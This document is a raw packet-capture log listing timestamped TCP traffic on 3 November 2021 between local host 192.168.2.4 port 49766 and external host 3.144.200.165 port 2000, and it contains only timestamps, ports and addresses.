Nov 3, 2021 14:44:40.344593048 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344635963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344670057 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344692945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344763994 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344805002 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344822884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344913960 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.344919920 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.344981909 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345027924 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345067978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345078945 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345107079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345144987 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345145941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345185995 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345227003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345232010 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345263004 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345293999 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345302105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345341921 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345379114 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345417023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345424891 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345455885 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345494986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345513105 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345536947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345575094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345586061 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345614910 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345654964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345655918 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345694065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345725060 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345732927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345774889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345778942 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345819950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345860004 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345869064 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345899105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345938921 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.345957994 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.345978022 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346009970 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346015930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346054077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346092939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346132040 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346138000 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346172094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346209049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346227884 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346247911 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346287966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346295118 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346327066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346360922 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346365929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346404076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346417904 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346445084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346486092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346515894 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346523046 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346563101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346600056 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346602917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346641064 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346668005 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346679926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346718073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346760035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346762896 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346800089 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346837997 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346848965 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346878052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346919060 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346920013 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346956968 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.346977949 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.346996069 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347026110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347067118 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347067118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347106934 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347145081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347151041 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347182989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347222090 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347222090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347261906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347281933 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347301960 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347340107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347361088 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347382069 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347420931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347453117 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347459078 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347496986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347516060 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347537041 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347580910 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347604036 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347620964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347659111 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347691059 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347697020 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347750902 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347754002 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347809076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347840071 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.347851038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.347929001 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.395066023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.447042942 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.489944935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.489975929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.489988089 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.490000963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.490084887 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.491507053 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.491534948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.491627932 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497478008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497513056 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497525930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497539043 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497555017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497572899 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497586966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497600079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497601032 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497642040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497668982 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497685909 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497709036 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497726917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497745037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497760057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497767925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497776985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497814894 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497818947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497847080 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497854948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497873068 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497891903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497905016 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497910023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497929096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497946978 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.497948885 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497966051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497984886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.497992992 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498004913 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498011112 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498023033 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498039961 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498054981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498070955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498085022 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498087883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498106003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498123884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498123884 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498141050 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498158932 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498159885 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498176098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498187065 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498193979 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498205900 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498212099 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498224974 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498229027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498248100 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498264074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498270035 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498296976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498311996 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498313904 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498342037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498358011 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498368979 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498404980 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498434067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498454094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498471022 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498495102 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498539925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498585939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498604059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498677969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498681068 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498696089 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498732090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498749971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498758078 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498763084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498776913 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498790026 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498801947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498815060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498820066 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498831987 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498846054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498856068 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498857975 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498872042 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498879910 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498893023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498904943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498910904 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498923063 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498936892 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498945951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.498950958 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498965025 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498985052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.498999119 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499018908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499020100 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.499032021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499032974 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.499046087 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499063969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499077082 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499083996 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.499089956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499109030 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499120951 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499134064 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499146938 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499145985 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.499160051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.499187946 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.499207973 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.499253988 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.500417948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500437021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500452995 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500468969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500485897 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500504017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500520945 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.500523090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500540018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500557899 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.500559092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500576019 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500585079 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.500597000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500614882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.500616074 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.500633001 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.500667095 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.596035957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.638648033 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.638674021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.638691902 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.638716936 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.638745070 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.638775110 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.641038895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.641092062 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.641118050 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.645831108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.645859957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.645879984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.645890951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.645900965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.645920992 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.645924091 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.645941973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.645961046 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.645962954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.645982981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646003008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646006107 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.646023989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646039963 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.646043062 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646063089 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646081924 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.646084070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646116972 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.646195889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646215916 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646235943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.646255970 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.647708893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647731066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647751093 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647773027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647793055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647814035 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647835016 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647842884 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.647855043 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647876024 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647892952 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.647896051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647916079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647927046 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.647936106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647955894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647959948 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.647977114 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.647998095 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648015976 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648016930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648039103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648051023 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648058891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648077965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648097038 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648098946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648118973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648132086 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648139000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648159981 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648161888 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648179054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648199081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.648209095 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.648219109 CET	2000	49766	3.144.200.165	192.168.2.4
